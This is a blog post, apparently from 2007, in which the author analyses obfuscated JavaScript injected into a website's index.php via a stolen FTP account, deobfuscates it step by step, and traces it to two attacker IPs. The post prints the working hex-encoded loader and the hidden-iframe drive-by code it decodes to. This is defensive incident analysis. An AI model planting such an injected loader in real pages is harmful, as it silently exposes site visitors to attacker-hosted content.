Sugree

skip to navigation

Malicious code in index.php

I got a report regarding security issue in some web pages since some anti-virus softwares notify the existing of trojan. After looking the code in detail, I found below code in index.php.

<script>function v475ecab335e87(v475ecab336686){ function v475ecab336e79 () {var v475ecab337941=16; return v475ecab337941;} return(parseInt(v475ecab336686,v475ecab336e79()));}function v475ecab338244(v475ecab338637){ function v475ecab33922b () {var v475ecab339627=2; return v475ecab339627;} var v475ecab338a3c='';for(v475ecab338e2e=0; v475ecab338e2e<v475ecab338637.length; v475ecab338e2e+=v475ecab33922b()){ v475ecab338a3c+=(String.fromCharCode(v475ecab335e87(v475ecab338637.substr(v475ecab338e2e, v475ecab33922b()))));}return v475ecab338a3c;} document.write(v475ecab338244('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Note that this file was just updated in last 2 days according to xferlog.

Wed Dec 12 00:38:02 2007 1 77.221.133.186 0 /var/www/www.xxxxxxxx.xx.th/www/index.php a _ i r xxxxxx ftp 0 * i

That means this file was modified by someone at 77.221.133.186, Russia, via the existing user xxxxxx (CEN). In other words, password of this user has been leaked for a while! After removing that code from index.php, I tried to understand how it works.

The first step is to add indent. I like beautiful codes.

function v475ecab335e87(v475ecab336686){
  function v475ecab336e79 () {
    var v475ecab337941=16;
    return v475ecab337941;
  }
  return(parseInt(v475ecab336686,v475ecab336e79()));
}
 
function v475ecab338244(v475ecab338637){ 
  function v475ecab33922b () {
    var v475ecab339627=2; 
    return v475ecab339627;
  } 
  var v475ecab338a3c='';
  for(v475ecab338e2e=0; v475ecab338e2e<v475ecab338637.length; v475ecab338e2e+=v475ecab33922b()){ 
    v475ecab338a3c+=(String.fromCharCode(v475ecab335e87(v475ecab338637.substr(v475ecab338e2e, v475ecab33922b()))));
  }
  return v475ecab338a3c;
} document.write(v475ecab338244('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Most of the codes are scrambled so it would be easier to rename variables and functions.

function parseHex(i){
  var j=16;
  return(parseInt(i,j));
}
 
function decode(i){
  var j = 2;
  var s='';
  for(k=0; k<i.length; k+=j){   
    s+=(String.fromCharCode(parseHex(i.substr(k, j))));
  }
  return s;
}
 
document.write(decode('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Ok, now I know that long text is encoded in Hexadecimal. Time for Python.

import re
s = '3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65613862207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3335373132292B273435356465643433645C272077696474683D3732206865696768743D343936207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'
print re.sub(r'(..)',lambda m: chr(int(m.group(1),16)),s)
<SCRIPT>window.status='Done';document.write('<iframe name=ea8b src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*35712)+'455ded43d\' width=72 height=496 style=\'display: none\'></iframe>')</SCRIPT>

The result is as follow.

window.status='Done';
document.write('<iframe name=ea8b src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*35712)+'455ded43d\' width=72 height=496 style=\'display: none\'></iframe>')

That is enough. Now I have 2 IP addresses.

77.221.133.186
77.221.133.188

Roti (alpha) thinks you may like these:

Submitted by sugree on Fri, 12/14/2007 - 11:59

Thank you for nice a great

Submitted by Anonymous (not verified) on Sat, 01/26/2008 - 09:51.

Thank you for nice a great analysis.

same thing happened to a couple of sites of ours.

it is kind of automated tool that will crawl your site from FTP and download and inject and upload any (index.php, index.html, index.htm, login.php, login.htm, default.htm)

I suspect that the account user/pass have been stolen by a trojan longtime ago.

regards

reply

Post new comment

Your name: *

E-mail: *

The content of this field is kept private and will not be shown publicly.

Homepage:

Comment: *

Input format

Filtered HTML

Web page addresses and e-mail addresses turn into links automatically.
Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <blockcode> <pre>
Lines and paragraphs break automatically.
You can enable syntax highlighting of source code with the following tags: <code>, <blockcode>, <html>. Beside the tag style "<foo>" it is also possible to use "[foo]".

Markdown

You can enable syntax highlighting of source code with the following tags: <code>, <blockcode>, <html>. Beside the tag style "<foo>" it is also possible to use "[foo]".
You can use Markdown syntax to format and style the text. Also see and Markdown Extra for tables, footnotes, and more.
Twitter-style @usersnames are linked to their Twitter account pages.
Twitter-style #hashtags are linked to search.twitter.com.

More information about formatting options

+ +++++++++++++++++++++++++++++++